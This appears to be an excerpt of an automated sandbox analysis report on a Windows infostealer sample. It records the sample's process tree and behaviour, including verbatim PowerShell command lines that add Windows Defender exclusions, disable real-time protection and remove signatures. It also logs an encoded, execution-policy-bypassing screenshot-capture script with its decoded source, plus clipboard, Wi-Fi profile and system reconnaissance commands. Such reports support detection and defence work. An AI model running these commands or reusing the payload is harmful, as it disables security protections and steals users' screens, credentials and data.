Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D01ACD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF67D01ACD8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B32D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_000001F91B32D2A4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B327D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_000001F91B327D90
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF72726C62C SetUnhandledExceptionFilter,	2_2_00007FF72726C62C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF72726C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF72726C44C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF72726BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FF72726BBC0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727279924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF727279924
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 3_2_00007FFE1331004C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00007FFE1331004C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201D1A4D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00000201D1A4D2A4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201D1A47D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00000201D1A47D90
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF72726C62C SetUnhandledExceptionFilter,	4_2_00007FF72726C62C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF72726C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FF72726C44C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF72726BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FF72726BBC0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727279924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FF727279924
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAA830D8 IsProcessorFeaturePresent,00007FFE132319A0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE132319A0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FFDFAA830D8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABA2004 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FFDFABA2004

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\ProgramData\setup.exe	NtQuerySystemInformation: Direct from: 0x7FF7FC9342AE
Source: C:\Recovery\HpQPPZazcv.exe	NtEnumerateValueKey: Indirect: 0x2D7293D
Source: C:\Recovery\HpQPPZazcv.exe	NtQuerySystemInformation: Indirect: 0x1B8C205D
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	NtQueryDirectoryFile: Indirect: 0x1BC223AE
Source: C:\Recovery\HpQPPZazcv.exe	NtQuerySystemInformation: Indirect: 0x2D72F57
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	NtEnumerateKey: Indirect: 0x1BC22842
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	NtEnumerateKey: Indirect: 0x1BC22875
Source: C:\Recovery\HpQPPZazcv.exe	NtResumeThread: Indirect: 0x2D7231E
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	NtQuerySystemInformation: Indirect: 0x1BC2205D
Source: C:\Recovery\HpQPPZazcv.exe	NtQuerySystemInformation: Indirect: 0x2D7205D
Source: C:\Recovery\HpQPPZazcv.exe	NtEnumerateValueKey: Indirect: 0x1B8C290E
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	NtResumeThread: Indirect: 0x1BC2231E
Source: C:\Recovery\HpQPPZazcv.exe	NtEnumerateKey: Indirect: 0x2D72842
Source: C:\Recovery\HpQPPZazcv.exe	NtEnumerateKey: Indirect: 0x2D72875
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	NtEnumerateValueKey: Indirect: 0x1BC2293D
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	NtDeviceIoControlFile: Indirect: 0x1BC22B9D
Source: C:\Recovery\HpQPPZazcv.exe	NtDeviceIoControlFile: Indirect: 0x1B8C2B9D
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	NtEnumerateValueKey: Indirect: 0x1BC2290E
Source: C:\Recovery\HpQPPZazcv.exe	NtEnumerateValueKey: Indirect: 0x2D7290E
Source: C:\Recovery\HpQPPZazcv.exe	NtDeviceIoControlFile: Indirect: 0x2D72B9D
Source: C:\Recovery\HpQPPZazcv.exe	NtEnumerateValueKey: Indirect: 0x1B8C293D

Maps a DLL or memory area into another process

Source: C:\ProgramData\setup.exe

Section loaded: NULL target: unknown protection: readonly

Modifies Windows Defender protection settings

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

Modifies the context of a thread in another process (thread injection)

Source: C:\ProgramData\setup.exe

Thread register set: target process: 7368

Removes signatures from Windows Defender

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"			Jump to behavior

Writes to foreign memory regions

Source: C:\ProgramData\setup.exe

Memory written: C:\Windows\System32\dialer.exe base: 66DD711010

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym	Jump to behavior
